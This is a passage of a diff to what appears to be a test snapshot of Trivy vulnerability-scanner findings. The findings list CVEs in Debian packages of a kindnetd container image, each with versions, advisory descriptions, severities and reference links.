"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-37600", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-37600", + "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "https://github.com/karelzak/util-linux/issues/1395", + "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "https://security.netapp.com/advisory/ntap-20210902-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-37600", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://avd.aquasec.com/nvd/cve-2021-37600", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://access.redhat.com/security/cve/CVE-2021-37600", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://github.com/karelzak/util-linux/issues/1395", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", + ], + }, + "category": "Vulnerability", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", + ], + }, + "category": "Vulnerability", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "coreutils: race condition vulnerability in chown and chgrp", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.19.8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.19.7", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5446-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "2.2.12-1+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5503-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5503-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5174", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", - "packageName": "golang.org/x/sys", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-14855", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - 